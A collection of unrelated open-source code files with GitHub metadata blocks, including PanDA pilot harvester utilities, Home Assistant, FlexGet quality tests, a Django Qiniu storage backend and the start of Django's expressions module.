file_desc['chksum'] = get_checksum_value(fspec.checksum)
logger.debug("File description - {} ".format(file_desc))
out_file_report[job.jobid].append(file_desc)
if out_file_report[job.jobid]:
if write_json(event_status_file, out_file_report):
            logger.debug('Stageout declared in: {0}'.format(event_status_file))
logger.debug('Report for stageout: {}'.format(out_file_report))
return True
else:
            logger.debug('Failed to declare stageout in: {0}'.format(event_status_file))
return False
else:
logger.debug('No Report for stageout')
return False
def publish_work_report(work_report=None, worker_attributes_file="worker_attributes.json"):
"""
Publishing of work report to file.
The work report dictionary should contain the fields defined in get_initial_work_report().
:param work_report: work report dictionary.
:param worker_attributes_file:
:raises FileHandlingFailure: in case of IOError.
:return: True or False
"""
if work_report:
try:
work_report['timestamp'] = time_stamp()
if "outputfiles" in work_report:
del(work_report["outputfiles"])
if "inputfiles" in work_report:
del (work_report["inputfiles"])
if "xml" in work_report:
del (work_report["xml"])
if write_json(worker_attributes_file, work_report):
logger.info("work report published: {0}".format(work_report))
return True
else:
logger.error("work report publish failed: {0}".format(work_report))
return False
except IOError:
logger.error("job report copy failed")
return False
except Exception as e:
logger.error("write json file failed: {0}".format(e))
return False
else:
# No work_report return False
return False
def publish_job_report(job, args, job_report_file="jobReport.json"):
"""
Copy job report file to make it accessible by Harvester. Shrink job report file.
:param job: job object.
:param args: Pilot arguments object.
:param job_report_file: name of job report (string).
:raises FileHandlingFailure: in case of IOError.
:return True or False
"""
src_file = os.path.join(job.workdir, job_report_file)
dst_file = os.path.join(args.harvester_workdir, job_report_file)
try:
logger.info(
"copy of payload report [{0}] to access point: {1}".format(job_report_file, args.harvester_workdir))
# shrink jobReport
job_report = read_json(src_file)
if 'executor' in job_report:
for executor in job_report['executor']:
if 'logfileReport' in executor:
executor['logfileReport'] = {}
if write_json(dst_file, job_report):
return True
else:
return False
except IOError:
logger.error("job report copy failed")
return False
def parse_job_definition_file(filename):
"""
This function parses the Harvester job definition file and re-packages the job definition dictionaries.
The format of the Harvester job definition dictionary is:
dict = { job_id: { key: value, .. }, .. }
The function returns a list of these dictionaries each re-packaged as
dict = { key: value } (where the job_id is now one of the key-value pairs: 'jobid': job_id)
:param filename: file name (string).
:return: list of job definition dictionaries.
"""
job_definitions_list = []
# re-package dictionaries
job_definitions_dict = read_json(filename)
if job_definitions_dict:
for job_id in job_definitions_dict:
res = {'jobid': job_id}
res.update(job_definitions_dict[job_id])
job_definitions_list.append(res)
return job_definitions_list
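# Worked example (hypothetical job ids and keys, for illustration only):
# a job definition file containing
#
#   {"1234": {"swRelease": "x", "jobPars": "y"},
#    "5678": {"swRelease": "z", "jobPars": "w"}}
#
# is returned by parse_job_definition_file() as
#
#   [{"jobid": "1234", "swRelease": "x", "jobPars": "y"},
#    {"jobid": "5678", "swRelease": "z", "jobPars": "w"}]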
|
{
"content_hash": "12363b6ebcd1f2927c8ebf371688763b",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 127,
"avg_line_length": 33.504347826086956,
"alnum_prop": 0.6242754563543559,
"repo_name": "PalNilsson/pilot2",
"id": "643253efba04ca1c6a03bc966b4476a4b7bc9cfa",
"size": "11860",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pilot/util/harvester.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1098187"
},
{
"name": "Shell",
"bytes": "624"
}
],
"symlink_target": ""
}
|
"""Implemented Protocols."""
# relative
from . import beaver
from . import spdz
from .aby3 import ABY3
__all__ = ["beaver", "spdz", "ABY3"]
|
{
"content_hash": "7c2db3da571fe43bcb7088a481679129",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 36,
"avg_line_length": 20.142857142857142,
"alnum_prop": 0.6595744680851063,
"repo_name": "OpenMined/PySyft",
"id": "22b2c3ce6ade1e3a92a6d7fc890d81389d7b4386",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "packages/syft/src/syft/core/smpc/protocol/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2084"
},
{
"name": "Cap'n Proto",
"bytes": "1377"
},
{
"name": "Dockerfile",
"bytes": "9740"
},
{
"name": "HCL",
"bytes": "4438"
},
{
"name": "JavaScript",
"bytes": "85898"
},
{
"name": "Jupyter Notebook",
"bytes": "33167760"
},
{
"name": "Makefile",
"bytes": "7605"
},
{
"name": "Mako",
"bytes": "510"
},
{
"name": "PowerShell",
"bytes": "161"
},
{
"name": "Python",
"bytes": "3710174"
},
{
"name": "Shell",
"bytes": "52371"
},
{
"name": "TypeScript",
"bytes": "346493"
}
],
"symlink_target": ""
}
|
"""BleBox binary sensor entities."""
from blebox_uniapi.binary_sensor import BinarySensor as BinarySensorFeature
from blebox_uniapi.box import Box
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
BinarySensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import DOMAIN, PRODUCT, BleBoxEntity
BINARY_SENSOR_TYPES = (
BinarySensorEntityDescription(
key="moisture",
device_class=BinarySensorDeviceClass.MOISTURE,
),
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up a BleBox entry."""
product: Box = hass.data[DOMAIN][config_entry.entry_id][PRODUCT]
entities = [
BleBoxBinarySensorEntity(feature, description)
for feature in product.features.get("binary_sensors", [])
for description in BINARY_SENSOR_TYPES
if description.key == feature.device_class
]
async_add_entities(entities, True)
class BleBoxBinarySensorEntity(BleBoxEntity[BinarySensorFeature], BinarySensorEntity):
"""Representation of a BleBox binary sensor feature."""
def __init__(
self, feature: BinarySensorFeature, description: BinarySensorEntityDescription
) -> None:
"""Initialize a BleBox binary sensor feature."""
super().__init__(feature)
self.entity_description = description
@property
def is_on(self) -> bool:
"""Return the state."""
return self._feature.state
|
{
"content_hash": "f80d69346933217ae34bc02a157716a4",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 86,
"avg_line_length": 30.87272727272727,
"alnum_prop": 0.7179034157832744,
"repo_name": "mezz64/home-assistant",
"id": "7eb6fd1e5a28fcce44e9457eb4a91a515527c498",
"size": "1698",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/blebox/binary_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Views for GSoCStudent.
"""
__authors__ = [
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
]
from django import forms
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.views import out_of_band
from soc.views.helper import decorators
from soc.views.helper import redirects
from soc.views.helper import responses
from soc.views.models import student
from soc.logic.models.user import logic as user_logic
from soc.modules.gsoc.logic.models.program import logic as program_logic
from soc.modules.gsoc.logic.models.student import logic as student_logic
from soc.modules.gsoc.logic.models.mentor import logic as mentor_logic
from soc.modules.gsoc.logic.models.org_admin import logic as org_admin_logic
from soc.modules.gsoc.views.helper import access
from soc.modules.gsoc.views.models import program as program_view
class View(student.View):
"""View methods for the Student model.
"""
DEF_STUDENT_PROJECTS_MSG_FMT = ugettext("List of my Student Projects "
" for %(name)s")
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.GSoCChecker(params)
rights['create'] = ['checkIsDeveloper']
rights['edit'] = [('checkIsMyActiveRole', student_logic)]
rights['delete'] = ['checkIsDeveloper']
rights['apply'] = [
'checkIsUser',
('checkIsActivePeriod',
['student_signup', 'scope_path', program_logic]),
('checkIsNotParticipatingInProgramInScope', [program_logic,
student_logic, org_admin_logic, mentor_logic]),
]
rights['manage'] = [('checkIsMyActiveRole', student_logic)]
rights['list_projects'] = [
('checkHasRoleForScope', [student_logic, ['active', 'inactive']]),
('checkIsAfterEvent', ['accepted_students_announced_deadline',
'scope_path', program_logic])]
new_params = {}
new_params['logic'] = student_logic
new_params['rights'] = rights
new_params['group_logic'] = program_logic
new_params['group_view'] = program_view.view
new_params['scope_view'] = program_view
new_params['name'] = "GSoC Student"
new_params['module_name'] = "student"
new_params['sidebar_grouping'] = 'Students'
new_params['module_package'] = 'soc.modules.gsoc.views.models'
new_params['url_name'] = 'gsoc/student'
patterns = [
(r'^%(url_name)s/(?P<access_type>list_projects)/%(scope)s$',
'%(module_package)s.%(module_name)s.list_projects',
'List of my Student Projects')]
new_params['extra_django_patterns'] = patterns
params = dicts.merge(params, new_params, sub_merge=True)
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def listProjects(self, request, access_type,
page_name=None, params=None, **kwargs):
"""View that lists all of the current user's Student Projects for the
Program given as Scope.
"""
from soc.modules.gsoc.views.models import student_project as project_view
user_entity = user_logic.getCurrentUser()
# pylint: disable=E1103
fields = {
'link_id': user_entity.link_id,
'scope_path': kwargs['scope_path']
}
try:
student_entity = student_logic.getFromKeyFieldsOr404(fields)
except out_of_band.Error, error:
return responses.errorResponse(
error, request, template=params['error_public'])
# set the fields we need for the Student Project list
fields = {'student': student_entity}
list_params = project_view.view.getParams().copy()
fmt = {'name': student_entity.scope.name}
list_params['list_description'] = self.DEF_STUDENT_PROJECTS_MSG_FMT % fmt
list_params['public_row_extra'] = lambda entity: {
'link': (redirects.getStudentEditRedirect(entity, list_params) if
entity.student.status != 'inactive' else
redirects.getPublicRedirect(entity, list_params))
}
return project_view.view.list(request, 'allow', page_name=page_name,
params=list_params, filter=fields)
view = View()
apply = decorators.view(view.apply)
create = decorators.view(view.create)
delete = decorators.view(view.delete)
edit = decorators.view(view.edit)
list = decorators.view(view.list)
list_projects = decorators.view(view.listProjects)
manage = decorators.view(view.manage)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
{
"content_hash": "3ff13219b7fc1b032917d9cc0dae461e",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 77,
"avg_line_length": 33.82857142857143,
"alnum_prop": 0.676731418918919,
"repo_name": "SRabbelier/Melange",
"id": "a89feabf4435be9cccb81cb5d5876239a161531a",
"size": "5346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/soc/modules/gsoc/views/models/student.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "C++",
"bytes": "20"
},
{
"name": "Java",
"bytes": "1496"
},
{
"name": "JavaScript",
"bytes": "1623582"
},
{
"name": "PHP",
"bytes": "1032"
},
{
"name": "Perl",
"bytes": "177565"
},
{
"name": "Python",
"bytes": "15317793"
},
{
"name": "Ruby",
"bytes": "59"
},
{
"name": "Shell",
"bytes": "15303"
}
],
"symlink_target": ""
}
|
import antlr3
import testbase
import unittest
class t016actions(testbase.ANTLRTest):
def setUp(self):
self.compileGrammar()
def testValid(self):
cStream = antlr3.StringStream("int foo;")
lexer = self.getLexer(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = self.getParser(tStream)
name = parser.declaration()
self.assertEqual(name, 'foo')
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "c94a38c238a33761e719294401b792be",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 49,
"avg_line_length": 24.75,
"alnum_prop": 0.6060606060606061,
"repo_name": "pballand/congress",
"id": "60ea53ac409c5fa4c96dc8718df032cb52412e1d",
"size": "495",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "thirdparty/antlr3-antlr-3.5/runtime/Python3/tests/t016actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "213793"
},
{
"name": "Shell",
"bytes": "2488"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import pytest
from jinja2 import Template
from flexget.plugins.parsers.parser_guessit import ParserGuessit
from flexget.plugins.parsers.parser_internal import ParserInternal
from flexget.utils.qualities import Quality
class TestQualityModule(object):
def test_get(self):
assert not Quality(), 'unknown quality is not false'
assert Quality('foobar') == Quality(), 'unknown not returned'
def test_common_name(self):
for test_val in ('720p', '1280x720'):
got_val = Quality(test_val).name
assert got_val == '720p', got_val
class TestQualityParser(object):
@pytest.fixture(scope='class', params=['internal', 'guessit'], ids=['internal', 'guessit'], autouse=True)
def parser(self, request):
if request.param == 'internal':
return ParserInternal
if request.param == 'guessit':
return ParserGuessit
@pytest.mark.parametrize("test_quality", [
('Test.File 1080p.web', '1080p webdl'),
('Test.File.2160p.web', '2160p webdl'),
('Test.File.1080.web-random', '1080p webdl'),
('Test.File.1080.webrandom', '1080p'),
('Test.File 1080p.web-dl', '1080p webdl'),
('Test.File.web-dl.1080p', '1080p webdl'),
('Test.File.WebHD.720p', '720p webdl'),
('Test.File.720p.bluray', '720p bluray'),
('Test.File.720hd.bluray', '720p bluray'),
('Test.File.1080p.bluray', '1080p bluray'),
('Test.File.2160p.bluray', '2160p bluray'),
('Test.File.1080p.cam', '1080p cam'),
('A Movie 2011 TS 576P XviD-DTRG', '576p ts xvid'),
('Test.File.720p.bluray.r5', '720p r5'),
('Test.File.1080p.bluray.rc', '1080p r5'),
# 10bit
('Test.File.480p.10bit', '480p 10bit'),
('Test.File.720p.10bit', '720p 10bit'),
('Test.File.720p.bluray.10bit', '720p bluray 10bit'),
('Test.File.1080p.10bit', '1080p 10bit'),
('Test.File.1080p.bluray.10bit', '1080p bluray 10bit'),
('Test.File.720p.web', '720p webdl'),
('Test.File.720p.webdl', '720p webdl'),
('Test.File.1280x720_web dl', '720p webdl'),
('Test.File.720p.h264.web.dl', '720p webdl h264'),
('Test.File.1080p.webhd.x264', '1080p webdl h264'),
('Test.File.480.hdtv.x265', '480p hdtv h265'),
('Test.File.web', 'webdl'),
('Test.File.web-dl', 'webdl'),
('Test.File.720P', '720p'),
('Test.File.1920x1080', '1080p'),
('Test.File.3840x2160', '2160p'),
('Test.File.1080i', '1080i'),
('Test File blurayrip', 'bluray'),
('Test.File.br-rip', 'bluray'),
('Test.File.720px', '720p'),
('Test.File.720p50', '720p'),
('Test.File.dvd.rip', 'dvdrip'),
('Test.File.dvd.rip.r5', 'r5'),
('Test.File.[576p][00112233].mkv', '576p'),
('Test.TS.FooBar', 'ts'),
('Test.File.360p.avi', '360p'),
('Test.File.[360p].mkv', '360p'),
('Test.File.368.avi', '368p'),
('Test.File.720p.hdtv.avi', '720p hdtv'),
('Test.File.1080p.hdtv.avi', '1080p hdtv'),
('Test.File.720p.preair.avi', '720p preair'),
        # ('Test.File.ts.dvdrip.avi', 'ts'),  This should not exist: having Telesync and DVDRip together is nonsense.
('Test.File.HDTS.blah', 'ts'),
        # ('Test.File.HDCAM.bluray.lie', 'cam'),  This should not exist: having Cam and Bluray together is nonsense.
# Test qualities as part of words. #1593
('Tsar.File.720p', '720p'),
('Camera.1080p', '1080p'),
# Some audio formats
('Test.File.DTSHDMA', 'dtshd'),
('Test.File.DTSHD.MA', 'dtshd'),
('Test.File.DTS.HDMA', 'dtshd'),
('Test.File.dts.hd.ma', 'dtshd'),
('Test.File.DTS.HD', 'dtshd'),
('Test.File.DTSHD', 'dtshd'),
('Test.File.DTS', 'dts'),
('Test.File.truehd', 'truehd'),
('Test.File.DTSHDMA', 'dtshd')
])
def test_quality_failures(self, parser, test_quality):
quality = parser().parse_movie(test_quality[0]).quality
assert str(quality) == test_quality[1], ('`%s` quality should be `%s` not `%s`' % (
test_quality[0], test_quality[1], quality
))
class TestFilterQuality(object):
_config = """
templates:
global:
parsing:
series: {{parser}}
movie: {{parser}}
mock:
- {title: 'Smoke.1280x720'}
- {title: 'Smoke.HDTV'}
- {title: 'Smoke.cam'}
- {title: 'Smoke.HR'}
accept_all: yes
tasks:
qual:
quality:
- hdtv
- 720p
min:
quality: HR+
max:
quality: "<=cam <HR"
min_max:
quality: HR-720i
"""
@pytest.fixture(scope='class', params=['internal', 'guessit'], ids=['internal', 'guessit'])
def config(self, request):
"""Override and parametrize default config fixture."""
return Template(self._config).render({'parser': request.param})
def test_quality(self, execute_task):
task = execute_task('qual')
entry = task.find_entry('rejected', title='Smoke.cam')
assert entry, 'Smoke.cam should have been rejected'
entry = task.find_entry(title='Smoke.1280x720')
assert entry, 'entry not found?'
assert entry in task.accepted, '720p should be accepted'
assert len(task.rejected) == 2, 'wrong number of entries rejected'
assert len(task.accepted) == 2, 'wrong number of entries accepted'
def test_min(self, execute_task):
task = execute_task('min')
entry = task.find_entry('rejected', title='Smoke.HDTV')
assert entry, 'Smoke.HDTV should have been rejected'
entry = task.find_entry(title='Smoke.1280x720')
assert entry, 'entry not found?'
assert entry in task.accepted, '720p should be accepted'
assert len(task.rejected) == 2, 'wrong number of entries rejected'
assert len(task.accepted) == 2, 'wrong number of entries accepted'
def test_max(self, execute_task):
task = execute_task('max')
entry = task.find_entry('rejected', title='Smoke.1280x720')
assert entry, 'Smoke.1280x720 should have been rejected'
entry = task.find_entry(title='Smoke.cam')
assert entry, 'entry not found?'
assert entry in task.accepted, 'cam should be accepted'
assert len(task.rejected) == 3, 'wrong number of entries rejected'
assert len(task.accepted) == 1, 'wrong number of entries accepted'
def test_min_max(self, execute_task):
task = execute_task('min_max')
entry = task.find_entry('rejected', title='Smoke.1280x720')
assert entry, 'Smoke.1280x720 should have been rejected'
entry = task.find_entry(title='Smoke.HR')
assert entry, 'entry not found?'
assert entry in task.accepted, 'HR should be accepted'
assert len(task.rejected) == 3, 'wrong number of entries rejected'
assert len(task.accepted) == 1, 'wrong number of entries accepted'
|
{
"content_hash": "b3e0469ae5f4201441673e1285bbc28b",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 110,
"avg_line_length": 39.432432432432435,
"alnum_prop": 0.5803975325565456,
"repo_name": "sean797/Flexget",
"id": "ff119e201deabb8842d58b89be981584888fc7f1",
"size": "7295",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "flexget/tests/test_qualities.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2170588"
}
],
"symlink_target": ""
}
|
from jumeaux.models import JudgementAddOnPayload, JudgementAddOnReference
class JudgementExecutor:
def exec(self, payload: JudgementAddOnPayload, reference: JudgementAddOnReference) -> JudgementAddOnPayload:
raise NotImplementedError()
|
{
"content_hash": "6c473a9c57be17fb6e97306725a5301f",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 112,
"avg_line_length": 41.666666666666664,
"alnum_prop": 0.82,
"repo_name": "tadashi-aikawa/gemini",
"id": "ad4d45bc68c840905d07b620d9132d743cd8e339",
"size": "273",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jumeaux/addons/judgement/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "84854"
}
],
"symlink_target": ""
}
|
import os
from django.utils.encoding import filepath_to_uri
from django.utils.six.moves.urllib.parse import urljoin
from django.core.files.storage import Storage
from django.core.files.base import ContentFile
from django.conf import settings
from qiniu import Auth, BucketManager, put_data
class QiniuStorage(Storage):
def __init__(self):
self.ak = os.environ.get('QINIU_ACCESS_KEY', getattr(settings, 'QINIU_ACCESS_KEY', None))
self.sk = os.environ.get('QINIU_SECRET_KEY', getattr(settings, 'QINIU_SECRET_KEY', None))
self.bn = os.environ.get('QINIU_BUCKET_NAME', getattr(settings, 'QINIU_BUCKET_NAME', None))
self.base_url = os.environ.get('QINIU_BUCKET_DOMAIN', getattr(settings, 'QINIU_BUCKET_DOMAIN', None))
self.auth = Auth(self.ak, self.sk)
def _open(self, name, mode='wb'):
return ContentFile(name, mode)
def _clean_name(self, name):
return name[2:]
def _save(self, name, content):
name = self._clean_name(name)
if hasattr(content, 'chunks'):
data = ''.join(chunk for chunk in content.chunks())
else:
data = content.read()
token = self.auth.upload_token(self.bn, name)
ret, info = put_data(token, name, data)
return name
def delete(self, name):
bucket = BucketManager(self.auth)
bucket.delete(self.bn, name)
def size(self, name):
name = self._clean_name(name)
bucket = BucketManager(self.auth)
ret, info = bucket.stat(self.bn, name)
return ret and ret['fsize']
def exists(self, name):
name = self._clean_name(name)
bucket = BucketManager(self.auth)
ret, info = bucket.stat(self.bn, name)
return ret and ret['hash']
def url(self, name):
return urljoin(self.base_url, filepath_to_uri(name))
|
{
"content_hash": "87f33e472a5e105e92e995383f009f1b",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 109,
"avg_line_length": 31.559322033898304,
"alnum_prop": 0.6364124597207304,
"repo_name": "isayme/django-blog",
"id": "23a546356119deff4850d50b3dcccc562b6dbd62",
"size": "1862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/qiniu_storage.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42843"
},
{
"name": "HTML",
"bytes": "17256"
},
{
"name": "JavaScript",
"bytes": "4403"
},
{
"name": "Python",
"bytes": "20180"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
}
|
import psutil
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.dates import strpdate2num
import pandas as pd
import sys
from pySPM.tools.fpanel import Fpanel
def plotLog(filename, watch=False, **kargs):
fig, ax = plt.subplots(1,1)
fig.subplots_adjust(hspace=0)
plt.show(block=False)
while True:
with open(filename, 'r') as f:
names = f.readline().rstrip().split('\t')
df = pd.read_csv(filename, skiprows=1, delimiter='\t', parse_dates=[0], na_values="<undefined>", names=names)
#df = df.dropna()
ax2 = df.plot("Time", subplots=True, ax=ax, sharex=True)
dt = df.iloc[-1,0]-df.iloc[0,0]
for a in ax2:
if dt.seconds < 15*60:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=1))
elif dt.seconds < 3*60*60:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=5))
else:
a.xaxis.set_major_locator(mpl.dates.MinuteLocator(interval=15))
a.xaxis.set_major_formatter(mpl.dates.DateFormatter('%H:%M'))
a.grid()
plt.minorticks_off()
if watch:
mypause(3)
else:
plt.show()
if not watch:
break
def mypause(interval):
backend = plt.rcParams['backend']
if backend in mpl.rcsetup.interactive_bk:
figManager = mpl._pylab_helpers.Gcf.get_active()
if figManager is not None:
canvas = figManager.canvas
if canvas.figure.stale:
canvas.draw()
canvas.start_event_loop(interval)
return
def main():
if len(sys.argv)>1:
filename = sys.argv[1]
print("Plot file \"{}\"".format(filename))
plotLog(filename, watch=False)
else:
F = Fpanel()
logfile = F.getLogFile()
plotLog(logfile, watch=True)
if __name__ == '__main__':
main()
|
{
"content_hash": "620dd9af729a717445d8a1ac2f8717c2",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 117,
"avg_line_length": 32.39344262295082,
"alnum_prop": 0.5774291497975709,
"repo_name": "scholi/pySPM",
"id": "279abfe465e4e7fe586fdd589088be83a17c4ca4",
"size": "1976",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pySPM/tools/emission_current_plotter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "421288"
}
],
"symlink_target": ""
}
|
from setuptools import setup, find_packages
setup(name="python-weixin",
version="0.0.1",
description="Weixin API client",
license="BSD",
install_requires=["simplejson","requests","six", "chardet"],
author="Zongxiao Cheng",
author_email="cacique1103@gmail.com",
url="https://github.com/zongxiao/python-weixin",
packages = find_packages(),
keywords= "weixin",
zip_safe = True)
|
{
"content_hash": "400e44913d1671a9e5d9620a9dbfd274",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 66,
"avg_line_length": 33.46153846153846,
"alnum_prop": 0.639080459770115,
"repo_name": "kingctan/python-weixin",
"id": "a8641b9df911820f265900cd53f30edb8f527d6a",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "21762"
}
],
"symlink_target": ""
}
|
"""A library of top-level style functions.
"""
__version__ = "$Revision: #1 $"
#===========================================================================
import os
import os.path as path
from .SubStyle import SubStyle
#===========================================================================
__all__ = [
'cleanupFilename',
'mergeDicts',
'resolveDefaults',
'stylePath',
]
#===========================================================================
def cleanupFilename( fname ):
""": Make the filename usable.
= INPUT VARIABLES
- fname Given a filename, clean-it up to make sure we can use it with
the file system.
= RETURN VALUE
- Returns a cleaned up form of the input file name.
"""
fname = fname.replace( ' ', '_' )
fname = fname.replace( '/', '_' )
fname = fname.replace( '\\', '_' )
fname = fname.replace( '!', '_' )
fname = fname.replace( '*', '_' )
fname = fname.replace( '`', '_' )
fname = fname.replace( "'", "_" )
fname = fname.replace( '"', "_" )
fname = fname.replace( '{', '(' )
fname = fname.replace( '}', ')' )
fname = fname.replace( '&', '_and_' )
return fname
#===========================================================================
# For internal use only.
def mergeDicts( d1, d2 ):
""": Recursively merge two dictionary data structures.
   This essentially performs a union of nested dictionary data structures.
"""
r = {}
r.update( d1 )
for key in d2:
value = d2[ key ]
if key in d1:
if isinstance( value, SubStyle ):
value = value.kwargs()
if isinstance( value, dict ) and ( key in d1 ):
other = d1[ key ]
if isinstance( other, SubStyle ):
other = other.kwargs()
value = mergeDicts( other, value )
r[ key ] = value
return r
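# Illustrative sketch (not part of the original module; the keys are made up
# for the example): merging a nested override into an existing structure keeps
# the untouched inner keys and replaces the overridden ones.
#
#   mergeDicts( { 'line' : { 'color' : 'red', 'width' : 2 } },
#               { 'line' : { 'color' : 'blue' } } )
#   # -> { 'line' : { 'color' : 'blue', 'width' : 2 } }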
#===========================================================================
# For internal use only.
def resolveDefaults( defaults, subNames = [], **kwargs ):
""": Resolve a new set of defaults.
   What this function will do is:
1) Make a duplicate of the default dictionary to be modified and
returned.
2) For each keyword-value parameter that is not set to None, that value
will be set in the dictionary to be returned. If the value is itself
a dictionary, then it will be "merged" into the return dictionary.
3) For each of the names specified by subNames that exists in the default
dictionary, its values will be set in the dictionary to be returned.
If the value is itself a dictionary, then it will be "merged" into the
return dictionary. It is important to note that the order of the
names specified in 'subNames' is important as that is the order
in which they are resolved.
4) Returns the return dictionary.
When a dictionary 'A' is "merged" into another dictionary 'B', this is much
like the built-in dictionary 'update' method ( 'B.update( A )' ). The
difference is that any value in 'A' that is set to None is not 'updated'
in 'B' and for any values that are themselves dictionaries, then they will
be "merged".
= INPUT VARIABLES
- defaults The current set of default values to resolve with.
- subNames A list of names of sub-properties to resolve (in the order
to resolve them in).
- kwargs Optional keyword arguments to also resolve.
= RETURN VALUE
- Return a new dictionary of default values.
"""
# First duplicate the given defaults
subDefaults = {}
subDefaults.update( defaults )
# Next add in any keyword arguments
for key in kwargs:
value = kwargs[ key ]
# If the kw value is not set, then ignore
if value is None:
continue
# We have a kw value and nothing has been set yet.
if isinstance( value, SubStyle ):
value = value.kwargs()
if isinstance( value, dict ) and ( key in subDefaults ):
other = subDefaults[ key ]
if isinstance( other, SubStyle ):
other = other.kwargs()
value = mergeDicts( other, value )
# Store the value
subDefaults[ key ] = value
for name in subNames:
if name in defaults:
tmp = defaults[ name ]
if tmp is None:
continue
if isinstance( tmp, SubStyle ):
tmp = tmp.kwargs()
if isinstance( tmp, dict ):
subDefaults = mergeDicts( subDefaults, tmp )
else:
subDefaults[ name ] = tmp
return subDefaults
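# Illustrative sketch (not part of the original module; values are made up):
# a keyword override that is itself a dictionary gets merged into the matching
# default entry rather than replacing it wholesale.
#
#   defaults = { 'color' : 'red', 'font' : { 'size' : 10 } }
#   resolveDefaults( defaults, font = { 'size' : 12 } )
#   # -> { 'color' : 'red', 'font' : { 'size' : 12 } }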
#===========================================================================
def stylePath( envvar = 'STYLEPATH' ):
""": Get the value of the STYLEPATH environment variable
= INPUT VARIABLE
- envvar The name of the environment variable to use for the style path.
= RETURN VALUE
- Return a list of paths as defined by the STYLEPATH environment variable.
"""
result = []
if envvar.startswith( '$' ):
envvar = envvar[ 1: ]
stylepath = os.getenv( envvar, "" )
stylepath = stylepath.split( ':' )
for directory in stylepath:
if len( directory.strip() ) == 0:
continue
p = path.normpath( path.expanduser( path.expandvars( directory ) ) )
result.append( p )
return result
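# Usage sketch (assumed environment value, not part of the original module):
#
#   os.environ[ 'STYLEPATH' ] = '~/styles:/opt/shared/styles'
#   stylePath()   # -> both entries, user/env expanded and normalized;
#                 #    empty entries in the colon-separated list are skipped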
#===========================================================================
|
{
"content_hash": "3eaf26235e7ef0c5312baa6ea58a0a57",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 79,
"avg_line_length": 29.796703296703296,
"alnum_prop": 0.5484049419140697,
"repo_name": "nasa/mplStyle",
"id": "682938278246a7af352a4330807844b209118da3",
"size": "7225",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mplStyle/types/lib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "578438"
}
],
"symlink_target": ""
}
|
import copy
import datetime
from django.core.exceptions import EmptyResultSet, FieldError
from django.db.backends import utils as backend_utils
from django.db.models import fields
from django.db.models.query_utils import Q
from django.utils.functional import cached_property
class Combinable:
"""
Provides the ability to combine one or two objects with
some connector. For example F('foo') + F('bar').
"""
# Arithmetic connectors
ADD = '+'
SUB = '-'
MUL = '*'
DIV = '/'
POW = '^'
